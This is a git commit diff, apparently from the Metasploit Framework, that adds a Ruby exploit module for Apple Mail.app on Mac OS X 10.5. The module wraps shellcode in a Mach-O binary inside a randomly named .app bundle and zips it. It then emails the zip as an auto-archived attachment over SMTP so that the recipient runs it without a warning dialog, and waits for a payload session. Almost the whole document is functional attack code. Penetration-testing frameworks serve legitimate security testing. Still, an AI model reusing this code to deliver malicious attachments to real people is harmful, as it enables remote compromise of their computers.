New mail.app exploit for leopard
git-svn-id: file:///home/svn/framework3/trunk@5209 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
907282b061
commit
9b343c7149
Binary file not shown.
|
@ -0,0 +1,231 @@
|
|||
##
|
||||
# $Id: mailapp_image_exec.rb 5206 2007-11-26 22:29:07Z hdm $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
|
||||
require 'rex'
|
||||
require 'msf/core'
|
||||
require 'zip/zipfilesystem'
|
||||
require 'ftools'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Osx::Email::MailAppAttachment < Msf::Exploit::Remote
|
||||
|
||||
#
|
||||
# This module sends email messages via smtp
|
||||
#
|
||||
include Exploit::Remote::SMTPDeliver
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mail.app Application Attachment Execution',
|
||||
'Description' => %q{
|
||||
This module exploits sends an email message to a user containing
|
||||
shellcode encoded into an executable attachment. The user does not receive
|
||||
any warning dialog when opening this attachment with Mail.app. Tested on 10.5.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => ['hdm', 'Kevin Finisterre <kf[at]digitalmunition.com>'],
|
||||
'Version' => '$Revision: 5206 $',
|
||||
'References' =>
|
||||
[
|
||||
# ?
|
||||
],
|
||||
'Stance' => Msf::Exploit::Stance::Passive,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 8192,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => "",
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => '-bind -find',
|
||||
},
|
||||
},
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Mail.app - Binary Payloads (x86)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
[ 'Mail.app - Binary Payloads (ppc)',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_PPC,
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 28 2007'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('MAILSUBJECT', [false, "The subject of the sent email"]),
|
||||
OptString.new('MAILMESSAGE', [false, "This text contents of the email message"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
data = rand_text_alpha(rand(32)+1)
|
||||
|
||||
msg = Rex::MIME::Message.new
|
||||
msg.mime_defaults
|
||||
msg.subject = datastore['MAILSUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
|
||||
msg.to = datastore['MAILTO']
|
||||
msg.from = datastore['MAILFROM']
|
||||
|
||||
txt = datastore['MAILMESSAGE'] || Rex::Text.rand_text_alpha(rand(32)+1)
|
||||
|
||||
bin = ''
|
||||
|
||||
if(target.arch.index(ARCH_PPC))
|
||||
bin = Rex::Text.to_osx_ppc_macho(payload.encoded, '')
|
||||
end
|
||||
|
||||
if(target.arch.index(ARCH_X86))
|
||||
bin = Rex::Text.to_osx_x86_macho(payload.encoded, '')
|
||||
end
|
||||
|
||||
|
||||
zfd = Tempfile.new('mailappzip')
|
||||
|
||||
# XXX: Race condition, fix the Zip API
|
||||
File.unlink(zfd.path)
|
||||
|
||||
name = rand_text_alpha(rand(4)+4).downcase.capitalize
|
||||
|
||||
Zip::ZipFile.open(zfd.path, Zip::ZipFile::CREATE) do |zf|
|
||||
|
||||
zf.dir.mkdir("#{name}.app")
|
||||
zf.dir.chdir("#{name}.app")
|
||||
|
||||
zf.dir.mkdir("Contents")
|
||||
zf.dir.chdir("Contents")
|
||||
|
||||
zf.file.open("Info.plist", "w") do |fd|
|
||||
fd.write(get_info_plist(name))
|
||||
end
|
||||
|
||||
zf.file.open("PkgInfo", "w") do |fd|
|
||||
fd.write("APPL????")
|
||||
end
|
||||
|
||||
zf.dir.mkdir("MacOS")
|
||||
zf.dir.chdir("MacOS")
|
||||
zf.file.open(name, "w") do |fd|
|
||||
fd.write(bin)
|
||||
end
|
||||
zf.dir.chdir("..")
|
||||
|
||||
zf.dir.mkdir("Resources")
|
||||
zf.dir.chdir("Resources")
|
||||
zf.file.open("#{name}.icns", "w") do |fd|
|
||||
fd.write(get_app_icns())
|
||||
end
|
||||
end
|
||||
|
||||
cmd = Rex::Text.encode_base64(File.read(zfd.path), "\r\n")
|
||||
zfd.close
|
||||
|
||||
msg.add_part(Rex::Text.encode_base64(txt, "\r\n"), "text/plain", "base64", "inline")
|
||||
msg.add_part(cmd , "application/zip; x-mac-auto-archive=yes; name=\"#{name}.app.zip\"", "base64", "attachment; filename=#{name}.app.zip" )
|
||||
|
||||
send_message(msg.to_s)
|
||||
|
||||
print_status("Waiting for a payload session (backgrounding)...")
|
||||
end
|
||||
|
||||
|
||||
def get_info_plist(name)
|
||||
|
||||
%Q|
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
|
||||
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
|
||||
|
||||
<plist version="1.0">
|
||||
|
||||
<dict>
|
||||
|
||||
<key>CFBundleDevelopmentRegion</key>
|
||||
|
||||
<string>English</string>
|
||||
|
||||
<key>CFBundleExecutable</key>
|
||||
|
||||
<string>#{name}</string>
|
||||
|
||||
<key>CFBundleGetInfoString</key>
|
||||
|
||||
<string>2.1.1</string>
|
||||
|
||||
<key>CFBundleIconFile</key>
|
||||
|
||||
<string>#{name}.icns</string>
|
||||
|
||||
<key>CFBundleIdentifier</key>
|
||||
|
||||
<string>com.#{name.downcase}</string>
|
||||
|
||||
<key>CFBundleInfoDictionaryVersion</key>
|
||||
|
||||
<string>6.0</string>
|
||||
|
||||
<key>CFBundleName</key>
|
||||
|
||||
<string>Busted</string>
|
||||
|
||||
<key>CFBundlePackageType</key>
|
||||
|
||||
<string>APPL</string>
|
||||
|
||||
<key>CFBundleShortVersionString</key>
|
||||
|
||||
<string>2.1.1</string>
|
||||
|
||||
<key>CFBundleSignature</key>
|
||||
|
||||
<string>????</string>
|
||||
|
||||
<key>CFBundleVersion</key>
|
||||
|
||||
<string>2.1.1</string>
|
||||
|
||||
<key>LSHasLocalizedDisplayName</key>
|
||||
|
||||
<false/>
|
||||
|
||||
<key>NSHumanReadableCopyright</key>
|
||||
|
||||
<string>#{name}</string>
|
||||
|
||||
</dict>
|
||||
|
||||
</plist>
|
||||
|
|
||||
end
|
||||
|
||||
def get_app_icns
|
||||
File.read(File.join(Msf::Config.install_root, "data", "exploits", "iceweasel_macosx.icns"))
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
Loading…
Reference in New Issue